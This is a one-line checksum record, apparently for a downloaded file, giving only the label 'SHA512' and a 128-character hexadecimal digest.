SHA512 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558